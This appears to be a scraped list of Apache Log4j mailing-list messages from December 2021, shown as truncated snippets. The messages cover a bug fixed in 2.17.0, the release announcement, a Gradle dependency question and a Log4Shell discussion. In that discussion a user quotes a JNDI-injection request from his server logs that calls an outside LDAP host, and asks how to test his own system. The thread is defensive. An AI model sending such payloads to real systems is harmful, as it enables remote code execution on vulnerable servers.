We have confirmed that this issue has been resolved in 2.17.0.
Thanks to the contributors.
On 2021/12/15 16:09, taketake wrote:
Hi everyone.
I was checking the operation of 2.16.0.
There, I found a case where no logs were output when I specified
lookups for ThreadContext.
Here is the code
I am glad to hear our latest and greatest works for you :-)
Gary
On Sat, Dec 18, 2021, 06:11 wrote:
> We have confirmed that this issue has been resolved in 2.17.0.
>
> Thanks to the contributors.
>
> On 2021/12/15 16:09, taketake wrote:
> > Hi everyone.
> >
> > I was checking the operation of
Hi
I have a webapp running using log4j and I can see various requests
containing jndi, e.g.
http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
whereas it is not clear to me whether the attack was successful.
Does anyone know how I could attack my own s
Michael,
First, please make sure you are using our latest and greatest, currently 2.17.0.
https://logging.apache.org/log4j/2.x/download.html
I don't want to spread the FUD here, but if you search the web for
"Log4Shell", you should find POCs.
TY!
Gary
On Sat, Dec 18, 2021 at 7:57 AM Michael Wec
Hi Gary
In the case of one webapp I was able to upgrade quickly to 2.17.0 and
everything seems to be fine :-)
Thanks for the hint, searching for "log4j shell poc" helps, so let's see
whether we can attack ourselves :-)
Thanks
Michael
Am 18.12.21 um 14:36 schrieb Gary Gregory:
Michael,
F
The Apache Log4j 2 team is pleased to announce the Log4j 2.17.0 release!
Apache Log4j is a well known framework for logging application behavior. Log4j
2 is an upgrade to Log4j that provides significant improvements over its
predecessor, Log4j 1.x, and provides many other modern features such as
Hi guys,
First message here, so first of all, THANK YOU VERY MUCH to the team. You
really deserve a big present this christmas!
El sáb, 18 dic 2021 a las 18:12, Ralph Goers ()
escribió:
> The Apache Log4j 2 team is pleased to announce the Log4j 2.17.0 release!
>
And now my question: in a multim
El sáb, 18 dic 2021 a las 22:01, jmiguel rodriguez (<
jmiguel.rodrig...@gmail.com>) escribió:
>
> Hi guys,
>
> First message here, so first of all, THANK YOU VERY MUCH to the team. You
> really deserve a big present this christmas!
>
> El sáb, 18 dic 2021 a las 18:12, Ralph Goers ()
> escribió:
>
I’m not going to be a lot of help on this as I don’t use Gradle.
The only thing I can think of that could be affecting this is that the
log4j-api pom.xml file was declaring a dependency
on the zip file generated by the log4j-api-java9 module. It had “provided”
scope meaning it should more or le
Not a problem. Glad your problem was fixed.
Ralph
> On Dec 18, 2021, at 2:12 PM, jmiguel rodriguez
> wrote:
>
> El sáb, 18 dic 2021 a las 22:01, jmiguel rodriguez (<
> jmiguel.rodrig...@gmail.com>) escribió:
>
>>
>> Hi guys,
>>
>> First message here, so first of all, THANK YOU VERY MUCH to
10 matches
Mail list logo
